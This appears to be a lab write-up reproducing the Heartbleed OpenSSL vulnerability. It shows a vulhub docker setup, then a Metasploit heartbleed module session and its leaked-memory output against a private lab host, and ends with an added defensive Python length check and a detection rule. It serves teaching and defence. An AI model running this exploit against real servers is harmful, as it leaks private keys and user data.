OpenSSL Heartbleed Vulnerability CVE-2014-0160
Vulnerability Description
On April 7, 2014, OpenSSL issued a security advisory for a vulnerability affecting OpenSSL 1.0.1 through 1.0.1f and 1.0.2 Beta 1. The vulnerability's Chinese name translates literally as "heart blood drop"; its English name is Heartbleed.
Affected Versions
OpenSSL 1.0.1, 1.0.1a, 1.0.1b, 1.0.1c, 1.0.1d, 1.0.1e, 1.0.1f, OpenSSL 1.0.2 Beta 1, and other versions
Environment setup
git clone https://github.com/vulhub/vulhub.git
cd vulhub/openssl/heartbleed
docker-compose up -d
Vulnerability reproduction
Use the Nmap detection script to scan the target.
Nmap detects the Heartbleed vulnerability; then use MSF to attack the target.
msf5 > use auxiliary/scanner/ssl/openssl_heartbleed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > show options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads (max one per host)
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)

Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.51.133
rhost => 192.168.51.133
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 192.168.51.133:443 - Leaking heartbeat response #1
[*] 192.168.51.133:443 - Sending Client Hello...
[*] 192.168.51.133:443 - SSL record #1:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 86
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 82
[*] 192.168.51.133:443 - Type: Server Hello (2)
[*] 192.168.51.133:443 - Server Hello Version: 0x0301
[*] 192.168.51.133:443 - Server Hello random data: 5fd46996727a4e50c0e2eaecf52d1592384aaa6870d4d65eea8b6b34eb47a389
[*] 192.168.51.133:443 - Server Hello Session ID length: 32
[*] 192.168.51.133:443 - Server Hello Session ID: 66e9cacbefcb28955de31c38bd9dff93de153a6d6247fa117ebc3f2f091d6f74
[*] 192.168.51.133:443 - SSL record #2:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 822
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 818
[*] 192.168.51.133:443 - Type: Certificate Data (11)
[*] 192.168.51.133:443 - Certificates length: 815
[*] 192.168.51.133:443 - Data length: 818
[*] 192.168.51.133:443 - Certificate #1:
[*] 192.168.51.133:443 - Certificate #1: Length: 812
[*] 192.168.51.133:443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, issuer=#<OpenSSL::X509::Name CN=localhost,O=Dis,L=Springfield,ST=Denial,C=US>, serial=#<OpenSSL::BN:0x00007efe8154c028>, not_before=2020-08-09 17:03:46 UTC, not_after=2021-08-09 17:03:46 UTC>
[*] 192.168.51.133:443 - SSL record #3:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 331
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 327
[*] 192.168.51.133:443 - Type: Server Key Exchange (12)
[*] 192.168.51.133:443 - SSL record #4:
[*] 192.168.51.133:443 - Type: 22
[*] 192.168.51.133:443 - Version: 0x0301
[*] 192.168.51.133:443 - Length: 4
[*] 192.168.51.133:443 - Handshake #1:
[*] 192.168.51.133:443 - Length: 0
[*] 192.168.51.133:443 - Type: Server Hello Done (14)
[*] 192.168.51.133:443 - Sending Heartbeat...
[*] 192.168.51.133:443 - Heartbeat response, 65535 bytes
[+] 192.168.51.133:443 - Heartbeat response with leak, 65535 bytes
[*] 192.168.51.133:443 - Printable info leaked:
[*] 192.168.51.133:443 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
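The scan above sends its heartbeat right after Server Hello Done and receives a 65535-byte response. The following is an added example (not part of the original post, and not OpenSSL or Metasploit code) of the defender-side length rule from RFC 6520 that stops such a leak: a heartbeat whose declared payload length does not fit in the record that carried it is discarded. It assumes plaintext heartbeat records; the helper names and sample bytes are constructed for illustration.

```python
import struct

HEARTBEAT = 24      # TLS record content type for heartbeat (RFC 6520)
HANDSHAKE = 22      # the "Type: 22" records in the scan log above
MIN_PADDING = 16    # RFC 6520 requires at least 16 bytes of padding

def record(ctype, fragment, version=0x0301):
    """Build one TLS record: type (1), version (2), length (2), fragment."""
    return struct.pack("!BHH", ctype, version, len(fragment)) + fragment

def parse_records(stream):
    """Yield (type, version, fragment) for each complete record in a byte stream."""
    off = 0
    while off + 5 <= len(stream):
        ctype, version, length = struct.unpack_from("!BHH", stream, off)
        fragment = stream[off + 5:off + 5 + length]
        if len(fragment) < length:
            break                      # truncated capture: stop, do not guess
        yield ctype, version, fragment
        off += 5 + length

def heartbeat_ok(fragment):
    """Return (accepted, reason) for one plaintext heartbeat message."""
    if len(fragment) < 1 + 2 + MIN_PADDING:
        return False, "too short for type, length and padding"
    _hb_type, claimed = struct.unpack_from("!BH", fragment, 0)
    if 1 + 2 + claimed + MIN_PADDING > len(fragment):
        return False, f"claims {claimed} payload bytes in a {len(fragment)}-byte message"
    return True, "length consistent"

def audit(stream):
    """Check every heartbeat record in the stream; other record types are skipped."""
    return [heartbeat_ok(f) for t, _v, f in parse_records(stream) if t == HEARTBEAT]

# Constructed sample traffic (not captured from the lab above).
HELLO = record(HANDSHAKE, bytes(4))
GOOD = record(HEARTBEAT, b"\x01" + struct.pack("!H", 4) + b"ping" + bytes(MIN_PADDING))
BAD = record(HEARTBEAT, b"\x01" + struct.pack("!H", 0x4000) + b"ping" + bytes(MIN_PADDING))

if __name__ == "__main__":
    for accepted, reason in audit(HELLO + GOOD + BAD):
        print("accept" if accepted else "DISCARD", "-", reason)
```

The same comparison works as a network detection: a heartbeat record whose declared payload length exceeds the record length is never legitimate traffic.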
This post is licensed under CC BY 4.0 by the author.